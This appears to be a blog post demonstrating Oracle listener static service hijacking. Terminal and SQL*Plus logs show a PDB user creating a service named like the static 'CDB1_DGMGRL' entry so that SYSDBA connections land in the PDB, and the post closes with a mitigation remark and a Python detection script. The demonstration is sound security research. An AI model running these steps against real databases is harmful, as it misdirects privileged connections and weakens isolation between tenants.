Oracle listener static service hi-jacking

# lsnrctl status
LSNRCTL for Linux: Version 19.0.0.0.0 - Development on 05-JAN-2019 18:06:26
Copyright (c) 1991, 2018, Oracle.  All rights reserved.
Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=0.0.0.0)(PORT=1521)))
STATUS of the LISTENER
------------------------
Alias LISTENER
Version TNSLSNR for Linux: Version 19.0.0.0.0 - Development
Start Date 16-DEC-2018 17:33:58
Uptime 20 days 0 hr. 32 min. 28 sec
Trace Level off
Security ON: Local OS Authentication
SNMP OFF
Listener Parameter File /u01/app/oracle/product/19.0.0/network/admin/listener.ora
Listener Log File /u01/app/oracle/diag/tnslsnr/VM190/listener/alert/log.xml
Listening Endpoints Summary...
(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=VM190)(PORT=1521)))
Services Summary...
Service "7cd707c6f0a7108ce053be38a8c0058b" has 1 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
Service "CDB1" has 1 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
Service "CDB1XDB" has 1 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
Service "CDB1_DGMGRL" has 1 instance(s).
Instance "CDB1", status UNKNOWN, has 1 handler(s) for this service...
Service "pdb1" has 1 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
The command completed successfully
SQL> connect demo/demo@//localhost/PDB1
Connected.
SQL> show con_name
CON_NAME
------------------------------
PDB1
SQL> exec dbms_service.create_service(service_name=>'CDB1_DGMGRL', network_name=>'CDB1_DGMGRL');
PL/SQL procedure successfully completed.
SQL> exec dbms_service.start_service('CDB1_DGMGRL');
PL/SQL procedure successfully completed.
Services Summary...
Service "7cd707c6f0a7108ce053be38a8c0058b" has 1 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
Service "CDB1" has 1 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
Service "CDB1XDB" has 1 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
Service "CDB1_DGMGRL" has 2 instance(s).
Instance "CDB1", status UNKNOWN, has 1 handler(s) for this service...
Instance "CDB1", status READY, has 1 handler(s) for this service...
Service "pdb1" has 1 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
The command completed successfully
# sqlplus -s sys/oracle@"(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=CDB1_DGMGRL))(ADDRESS=(PROTOCOL=tcp)(HOST=127.0.0.1)(PORT=1521)))" as sysdba <<<'show con_name'
CON_NAME
------------------------------
PDB1
# sqlplus -s sys/oracle@"(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=CDB1_DGMGRL)(INSTANCE_NAME=CDB1)(STATIC_SERVICE=TRUE))(ADDRESS=(PROTOCOL=TCP)(HOST=127.0.0.1)(PORT=1521)))" as sysdba <<<'show con_name'
CON_NAME
------------------------------
PDB1
SQL> connect demo/demo@//localhost/PDB1
Connected.
SQL> exec dbms_service.stop_service('CDB1_DGMGRL');
PL/SQL procedure successfully completed.
Services Summary...
Service "7cd707c6f0a7108ce053be38a8c0058b" has 1 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
Service "CDB1" has 1 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
Service "CDB1XDB" has 1 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
Service "CDB1_DGMGRL" has 1 instance(s).
Instance "CDB1", status UNKNOWN, has 1 handler(s) for this service...
Service "pdb1" has 1 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
The command completed successfully
SQL> connect sys/oracle@"(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=CDB1_DGMGRL))(ADDRESS=(PROTOCOL=tcp)(HOST=127.0.0.1)(PORT=1521)))" as sysdba
Connected.

SQL> select sys_context('userenv','service_name') from dual;
SYS_CONTEXT('USERENV','SERVICE_NAME')
--------------------------------------------------------------------
SYS$USERS
SQL> show con_name
CON_NAME
------------------------------
PDB1
SQL> exec dbms_service.delete_service('CDB1_DGMGRL');
PL/SQL procedure successfully completed.
# sqlplus -s sys/oracle@"(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=CDB1_DGMGRL)(INSTANCE_NAME=CDB1)(STATIC_SERVICE=TRUE))(ADDRESS=(PROTOCOL=TCP)(HOST=127.0.0.1)(PORT=1521)))" as sysdba <<<'show con_name'
CON_NAME
------------------------------
CDB$ROOT

Solution(s)

Basics: be careful with powerful privileges, such as INHERIT PRIVILEGES, which can allow a PDB DBA to overwrite a common user procedure with authid current_user.
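
A check for the state shown in the second listing above, where "CDB1_DGMGRL" carries both its static entry (status UNKNOWN) and a dynamically registered handler (status READY). This is an added example, not code from the original post; the function names are hypothetical, the sample text is constructed from the page's listing, and treating any non-UNKNOWN status as a dynamic registration is a generalization beyond the READY case shown.

```python
import re

# Constructed sample in the shape of `lsnrctl status` output,
# using the service names from the listing on this page.
SAMPLE = '''\
Services Summary...
Service "CDB1" has 1 instance(s).
  Instance "CDB1", status READY, has 1 handler(s) for this service...
Service "CDB1_DGMGRL" has 2 instance(s).
  Instance "CDB1", status UNKNOWN, has 1 handler(s) for this service...
  Instance "CDB1", status READY, has 1 handler(s) for this service...
Service "pdb1" has 1 instance(s).
  Instance "CDB1", status READY, has 1 handler(s) for this service...
The command completed successfully
'''

SERVICE_RE = re.compile(r'^\s*Service "([^"]+)" has \d+ instance\(s\)\.')
INSTANCE_RE = re.compile(r'^\s*Instance "([^"]+)", status (\w+),')

def parse_services(text):
    """Return {service_name: [(instance, status), ...]} from lsnrctl output."""
    services, current = {}, None
    for line in text.splitlines():
        m = SERVICE_RE.match(line)
        if m:
            current = services.setdefault(m.group(1), [])
            continue
        m = INSTANCE_RE.match(line)
        if m and current is not None:
            current.append((m.group(1), m.group(2)))
    return services

def shadowed_static_services(text):
    """Names with a static entry (status UNKNOWN, from listener.ora) that
    also have a dynamically registered handler (any other status)."""
    flagged = []
    for name, handlers in parse_services(text).items():
        statuses = {status for _, status in handlers}
        if "UNKNOWN" in statuses and statuses - {"UNKNOWN"}:
            flagged.append(name)
    return sorted(flagged)

if __name__ == "__main__":
    for name in shadowed_static_services(SAMPLE):
        print(f"static service {name!r} also has a dynamic registration")
```

The later listing on this page shows the limit of this check: after dbms_service.stop_service the listener is back to a single UNKNOWN entry, yet the connection still lands in PDB1 until the service is deleted.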

Franck Pachot


Developer Advocate at Yugabyte, Open Source distributed SQL database 🚀 Also Oracle ACE Director, Oracle Certified Master, AWS Data Hero, OakTable member